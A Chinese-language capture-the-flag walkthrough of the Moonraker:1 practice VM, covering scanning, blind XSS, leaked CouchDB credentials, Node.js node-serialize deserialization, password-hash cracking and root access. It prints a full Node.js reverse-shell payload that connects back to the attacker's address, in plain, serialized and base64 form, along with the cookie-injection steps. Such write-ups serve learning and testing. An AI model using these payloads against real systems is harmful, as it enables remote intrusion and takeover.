Moonraker:1靶機入侵

 

 0x01 前言

攻擊Moonraker系統而且找出存在最大的威脅漏洞，經過最大威脅漏洞攻擊目標靶機系統並進行提權獲取系統中root目錄下的flag信息。

Moonraker: 1鏡像下載地址：

http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA

0x02 信息收集

1.存活主機掃描

root@kali2018:/# arp-scan -l

發現192.168.1.10是目標靶機系統

2.端口掃描

namp掃描目標靶機端口

root@kali2018:~# nmap -p  - -A  192.168.1.10  --open Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 16:21 EST
 Nmap scan report for 192.168.1.10 Host is up (0.00077s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp    open  sshOpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0) | ssh-hostkey: |   2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA) |   256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA) |_  256 0d:88:d9:fa:af:08:ce:2b:13:66:a7:70:ec:49:02:10 (ED25519) 80/tcp    open  httpApache httpd 2.4.25 ((Debian)) | http-robots.txt: 1 disallowed entry |_/

|_http-server-header: Apache/2.4.25 (Debian) |_http-title: MOONRAKER 3000/tcp open httpNode.js Express framework | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_  Basic realm=401

|_http-title: Site doesn't have a title (text/html; charset=utf-8).

4369/tcp open epmdErlang Port Mapper Daemon | epmd-info: |   epmd_port: 4369

| nodes: |_    couchdb: 33681

5984/tcp  open  couchdb?

| fingerprint-strings: | FourOhFourRequest: |     HTTP/1.0 404 Object Not Found |     Cache-Control: must-revalidate | Connection: close |     Content-Length: 58

|     Content-Type: application/json |     Date: Mon, 11 Feb 2019 21:22:55 GMT |     Server: CouchDB/2.2.0 (Erlang OTP/19) |     X-Couch-Request-ID: bf092a958f |     X-CouchDB-Body-Time: 0

|     {"error":"not_found","reason":"Database does not exist."} | GetRequest: |     HTTP/1.0 200 OK |     Cache-Control: must-revalidate | Connection: close |     Content-Length: 164

|     Content-Type: application/json |     Date: Mon, 11 Feb 2019 21:22:02 GMT |     Server: CouchDB/2.2.0 (Erlang OTP/19) |     X-Couch-Request-ID: f038a56575 |     X-CouchDB-Body-Time: 0

|{"couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{"name":"The Apache Software Foundation"}} | HTTPOptions: |     HTTP/1.0 500 Internal Server Error |     Cache-Control: must-revalidate | Connection: close |     Content-Length: 61

|     Content-Type: application/json |     Date: Mon, 11 Feb 2019 21:22:02 GMT |     Server: CouchDB/2.2.0 (Erlang OTP/19) |     X-Couch-Request-ID: fdeb1a3860 |     X-Couch-Stack-Hash: 1828508689

|     X-CouchDB-Body-Time: 0

|_{"error":"unknown_error","reason":"badarg","ref":1828508689}

NMAP掃描輸出顯示開放端口服務：22（ssh），80（http），110（pop3），3000（node.js），4369（epmd）,5984（couchdb）

3.目錄掃描

我比較喜歡gobuster和DirBuster來進行目錄掃描，這裏我用gobuster進行目標目錄掃描。

在掃描完成後，發現一個可疑的目錄爲/services

打開該目錄的連接地址http://192.168.1.10/services/,能夠在網頁底部看到SEND AN INIRIRY的超級連接，而後打開超連接。

打開連接後顯示了一個售後聯繫信息頁面。注意到有人會查詢咱們提交的信息，並會在5分鐘內與咱們聯繫。

這裏咱們使用<img>標籤嵌套了個人遠程服務網站地址。（只要對方訪問了該嵌套xss，遠端服務器的日誌就會被記錄訪問請求日誌記錄）

apache啓動

在提交信息前，啓動apache服務，並在/var/www/html目錄下新建一個測試文件test.txt，內容隨便寫一個。

root@kali2018:~# /etc/init.d/apache2 start [ ok ] Starting apache2 (via systemctl): apache2.service. root@kali2018:~# cd /var/www root@kali2018:/var/www# ls html root@kali2018:/var/www# cd html/ root@kali2018:/var/www/html# ls index.html index.nginx-debian.html root@kali2018:/var/www/html# vi test.txt root@kali2018:/var/www/html#

測試apache服務器能正常訪問

隨後能夠經過apache2 access.log能夠查看到訪問目標靶機網站日誌記錄。點擊提交後，它已顯示感謝您的提交消息，以下圖所示。

經過命令查看apache訪問日誌

tail -f /var/log/apache2/access.log

能夠發現日誌中有一個有趣的http refefer地址：http://192.168.1.10/svc-inq/salesmoon-gui.php

0x03 漏洞利用

1.CouchDB信息收集

咱們在瀏覽器中打開http refefer請求地址

而後顯示出"返回銷售管理後臺"的超連接,點擊可進入到銷售後臺管理登陸頁面。

接下來咱們點擊CouchDB Notes並獲得一些關於用戶名的密碼的提示：

用戶名：jaws ，密碼：jaws女朋友名字+ x99  

在這裏，咱們谷歌搜索Jaws' girlfriend

 

已獲取到Fauxton系統中Apache CouchDB的用戶名和密碼。要了解有關Fauxton和CouchDB的更多信息，咱們能夠經過googel搜索它們的使用方法(http://docs.couchdb.org/en/stable/fauxton/install.html).

2.CouchDB登陸及信息泄露

 因爲端口5984是開放的。能夠打開CouchDB登陸頁面(192.168.1.10:5984/_utils/).

 這裏咱們使用了Login Credentials，以下所示：

Username: jaws

Password: dollyx99

 

已成功登陸,如今讓咱們查看這3個數據庫中的信息。

該links數據庫暴露出更多的信息

查看該連接數據庫中的文檔，由於每一個文檔都包含目錄連接，但第三個目錄連接可能會爲咱們的下一步滲透提供有用的信息。

所以，咱們打開第三個文檔的鏈接，並查看到有用的鏈接目錄信息。

因此上面的連接，在打開後顯示出一我的事辦公備忘記錄的信息（這裏記錄幾我的的重要郵件信息）

能夠看到郵件中泄露了用戶名和密碼

3.Node.js反序列化

這裏打開http://192.168.1.10/raker-sales/後臺管理頁面，發現「hugo's page moved to port 3k」頁面是有趣的（結合上面人事備忘記錄頁面中的hugo郵件信息）

打開該連接後，可看到有關node.js服務器和訪問的信息

 

 

用戶名和密碼在Hugo的HR郵件中http://192.168.1.10/HR-Confidential/offer-letters.html

顯示出登陸node.js的用戶名和密碼（經過3000端口訪問）

 

登陸後，node.js服務器會發送「Set-Cookie」信息。

Node.js反序列化漏洞相關信息能夠參考該連接地址。

4.反序化漏洞利用

從NMAP Scan輸出，咱們知道端口3000是Node.js框架應用。所以，咱們在瀏覽器上打開目標IP的3000端口應用並彈出登陸用戶界面。

Username: hugo

Password: TempleLasersL2K

成功登陸後，咱們會在頁面中顯示一條消息。這個頁面彷佛毫無用處，但在花時間搞清楚下一步該作什麼後，它變得很是有趣。

啓動F12查看頁面的請求信息。在Cookie中看到了base64編碼信息。這裏咱們將以base64編碼形式插入node.js反序列化漏洞。

 

使用msfvenom生成nodejs反彈shell

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.21  LPORT=1234

從終端輸出msfvenom到rce.js

rce.js：

var rev = { rce: function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, "192.168.1.21", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); } }; var serialize = require('node-serialize'); console.log(serialize.serialize(rev));

 

運行node rce.js以獲取序列化字符串輸出。

root@kali2018:/opt# node rce.js {"rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, \"192.168.1.21\", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === \"undefined\") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(\"error\", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }"}

接下來，將IIFE括號()添加到上一步的序列化字符串輸出的末尾

{"rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, \"192.168.1.21\", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === \"undefined\") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(\"error\", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }()"}

而後將其轉換成base64編碼

eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7IHZhciByZXF1aXJlID0gZ2xvYmFsLnJlcXVpcmUgfHwgZ2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZDsgaWYgKCFyZXF1aXJlKSByZXR1cm47IHZhciBjbWQgPSAoZ2xvYmFsLnByb2Nlc3MucGxhdGZvcm0ubWF0Y2goL153aW4vaSkpID8gXCJjbWRcIiA6IFwiL2Jpbi9zaFwiOyB2YXIgbmV0ID0gcmVxdWlyZShcIm5ldFwiKSwgY3AgPSByZXF1aXJlKFwiY2hpbGRfcHJvY2Vzc1wiKSwgdXRpbCA9IHJlcXVpcmUoXCJ1dGlsXCIpLCBzaCA9IGNwLnNwYXduKGNtZCwgW10pOyB2YXIgY2xpZW50ID0gdGhpczsgdmFyIGNvdW50ZXI9MDsgZnVuY3Rpb24gU3RhZ2VyUmVwZWF0KCl7IGNsaWVudC5zb2NrZXQgPSBuZXQuY29ubmVjdCgxMjM0LCBcIjE5Mi4xNjguMS4yMVwiLCBmdW5jdGlvbigpIHsgY2xpZW50LnNvY2tldC5waXBlKHNoLnN0ZGluKTsgaWYgKHR5cGVvZiB1dGlsLnB1bXAgPT09IFwidW5kZWZpbmVkXCIpIHsgc2guc3Rkb3V0LnBpcGUoY2xpZW50LnNvY2tldCk7IHNoLnN0ZGVyci5waXBlKGNsaWVudC5zb2NrZXQpOyB9IGVsc2UgeyB1dGlsLnB1bXAoc2guc3Rkb3V0LCBjbGllbnQuc29ja2V0KTsgdXRpbC5wdW1wKHNoLnN0ZGVyciwgY2xpZW50LnNvY2tldCk7IH0gfSk7IHNvY2tldC5vbihcImVycm9yXCIsIGZ1bmN0aW9uKGVycm9yKSB7IGNvdW50ZXIrKzsgaWYoY291bnRlcjw9IDEwKXsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgU3RhZ2VyUmVwZWF0KCk7fSwgNSoxMDAwKTsgfSBlbHNlIHByb2Nlc3MuZXhpdCgpOyB9KTsgfSBTdGFnZXJSZXBlYXQoKTsgfSgpIn0=

 

先登陸node.js後臺，而後再刷新頁面，經過bupsuit進行攔截，將整個base64字符串設置爲cookie中profile的值，替換完profile值後進行攔截提交，在者以前，您須要設置您的nc偵聽。

如今，咱們在攻擊機上監聽netcat，而後經過python腳本進入交互shell界面：python -c 'import pty; pty.spawn("/bin/bash")'

root@kali2018:/opt# nc -lvvp 1234 listening on [any] 1234 ... 192.168.1.10: inverse host lookup failed: Unknown host connect to [192.168.1.21] from (UNKNOWN) [192.168.1.10] 46010 id uid=1001(jaws) gid=1001(jaws) groups=1001(jaws) python -c "import pty;pty.spawn('/bin/bash')" jaws@moonraker:/$

0x04 權限提高

在枚舉jaws賬戶期間，我注意到Postfix正在本地監聽25端口。

netstat  -ano

咱們進入目錄/var/mial中發現了四個郵箱帳號信息，但沒有權限訪問它們。

jaws@moonraker:~$ cd  /var/mai jaws@moonraker:/var/mail$ ls -al total 96 drwxrwsr-x  2 root          mail4096 Oct 14 10:25 . drwxr-xr-x 12 root          root  4096 Sep 20 17:38 .. -rw-------  1 hugo          mail2994 Oct  6 11:47 hugo -rw-------  1 moonrakertech mail  1478 Oct5 19:24 moonrakertech -rw-------  1 root          mail 68975 Oct  6 11:40 root -rw-------  1 sales         mail6342 Oct 14 10:25 sales

在瞭解了CouchDb的配置以後，咱們發現CouchDb的默認安裝目錄是/opt/couchdb，從/etc/local.ini讀取配置文件。

讓咱們查看local.ini中的配置內容

jaws@moonraker:/var/mail$tail /opt/couchdb/etc/local.ini Username: hugo Password: 321Blast0ff!! eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExOCw5NywxMTQsMzIsMTEwLDEwMSwxMTYsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEwNSwxMTQsMTAxLDQwLDM5LDExMCwxMDEsMTE2LDM5LDQxLDU5LDEwLDExOCw5NywxMTQsMzIsMTE1LDExMiw5NywxMTksMTEwLDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTE1LDExMiw5NywxMTksMTEwLDU5LDEwLDcyLDc5LDgzLDg0LDYxLDM0LDQ5LDUwLDU1LDQ2LDQ4LDQ2LDQ4LDQ2LDQ5LDM0LDU5LDEwLDgwLDc5LDgyLDg0LDYxLDM0LDUwLDUxLDUxLDUxLDM0LDU5LDEwLDg0LDczLDc3LDY5LDc5LDg1LDg0LDYxLDM0LDUzLDQ4LDQ4LDQ4LDM0LDU5LDEwLDEwNSwxMDIsMzIsNDAsMTE2LDEyMSwxMTIsMTAxLDExMSwxMDIsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSw2MSw2MSwzMiwzOSwxMTcsMTEwLDEwMCwxMDEsMTAyLDEwNSwxMTAsMTAxLDEwMCwzOSw0MSwzMiwxMjMsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsMTA1LDExNiw0MSwzMiwxMjMsMzIsMTE0LDEwMSwxMTYsMTE3LDExNCwxMTAsMzIsMTE2LDEwNCwxMDUsMTE1LDQ2LDEwNSwxMTAsMTAwLDEwMSwxMjAsNzksMTAyLDQwLDEwNSwxMTYsNDEsMzIsMzMsNjEsMzIsNDUsNDksNTksMzIsMTI1LDU5LDMyLDEyNSwxMCwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsMzIsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiwzMiw2MSwzMiwxMTAsMTAxLDExOSwzMiwxMTAsMTAxLDExNiw0Niw4MywxMTEsOTksMTA3LDEwMSwxMTYsNDAsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0Niw5OSwxMTEsMTEwLDExMCwxMDEsOTksMTE2LDQwLDgwLDc5LDgyLDg0LDQ0LDMyLDcyLDc5LDgzLDg0LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMTUsMTA0LDMyLDYxLDMyLDExNSwxMTIsOTcsMTE5LDExMCw0MCwzOSw0Nyw5OCwxMDUsMTEwLDQ3LDExNSwxMDQsMzksNDQsOTEsOTMsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTksMTE0LDEwNSwxMTYsMTAxLDQwLDM0LDY3LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDUsMTEwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDEsMTE0LDExNCw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExMSwxMTAsNDAsMzksMTAxLDEyMCwxMDUsMTE2LDM5LDQ0LDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw5OSwxMTEsMTAwLDEwMSw0NCwxMTUsMTA1LDEwMywxMTAsOTcsMTA4LDQxLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDEwMSwxMTAsMTAwLDQwLDM0LDY4LDEwNSwxMTUsOTksMTExLDExMCwxMTAsMTAxLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTExLDExMCw0MCwzOSwxMDEsMTE0LDExNCwxMTEsMTE0LDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDEsMTE2LDg0LDEwNSwxMDksMTAxLDExMSwxMTcsMTE2LDQwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDQ0LDMyLDg0LDczLDc3LDY5LDc5LDg1LDg0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwxMjUsMTAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNTksMTApKX0oKSJ9Cg==

有了hugo密碼，我登陸他的賬戶並閱讀他的郵件。

jaws@moonraker:/var/mail$ su hugo Password: 321Blast0ff! Mail version 8.1.2 01/15/2001.  Type ? for help.

登陸hugo用戶後，而後讀取了其郵件信息，咱們注意到Message 2頗有趣，由於它包含root和哈希密碼，而且還告訴咱們該密碼也在VROOM系統中使用。

jaws@moonraker:/var/mail$ mail "/var/mail/hugo": 3 messages 3 new

>N  1 moonrakertech@moo  Fri Oct5 19:11   17/842 RE:Root Access N2 moonrakertech@moo Fri Oct 5 19:3923/1351 RE:RE:RE:Root Access N3 hr@moonraker.loca Fri Oct 5 20:2417/801 Decompression Accident &

這裏咱們讀取郵件2的信息

>N  1 moonrakertech@moo  Fri Oct5 19:11   17/842 RE:Root Access N2 moonrakertech@moo Fri Oct 5 19:3923/1351 RE:RE:RE:Root Access N3 hr@moonraker.loca Fri Oct 5 20:2417/801 Decompression Accident & 2 Message 2: From moonrakertech@moonraker.localdomainFri Oct 5 19:39:51 2018 X-Original-To: hugo@moonraker.localdomain To: hugo@moonraker.localdomain Subject: RE:RE:RE:Root Access MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Date: Fri, 5 Oct 2018 19:39:51 -0400 (EDT) From: moonrakertech@moonraker.localdomain Hugo...I'm being given a reward huh? Finally some well deserved recognition! Also this better come with a bump in pay otherwise I'm not afraid to give you a piece of my mind! See you outside of the Decompression Chamber shortly as per your request...I'm expecting the Award to be in hand as I don't like to get up from me desk. Also your ticket has been complete. Since I'm feeling nice today, I'm including the password here in its native hash and not in the ticket. BTW this is the old password hash, the new one is the same + "VR00M" without quotes. Have fun with the decryption process "Boss"! Haha! root:$6$auLf9y8f$qgi63MGYQGnnk6.6ktcZIMpROPMqMXMEM7JufH1aTIApIPIZZu7yRjfIcZ1pELNoeMM7sIwCrVmMCjNYJRRGf/:17809:0:99999:7:::

這裏顯示了root以及對應舊密碼的hash值

讓咱們複製舊密碼哈希並經過John the Ripper進行離線破解

john  root.hash

Username: root

Password: cyber

最終新的登陸密碼爲：cyber+VR00M(cyberVR00M)

使用root身份登陸系統。

su root Password: cyberVR00M hugo@moonraker:/var/mail$ su root Password: cyberVR00M

0X05 flag信息查看

成功以root身份登陸，在檢查其郵件目錄時，咱們找到了flag.txt文件。

root@moonraker:~# cd /root root@moonraker:~# ls coreDesktop Downloads flag.txt root@moonraker:~# cat flag.txt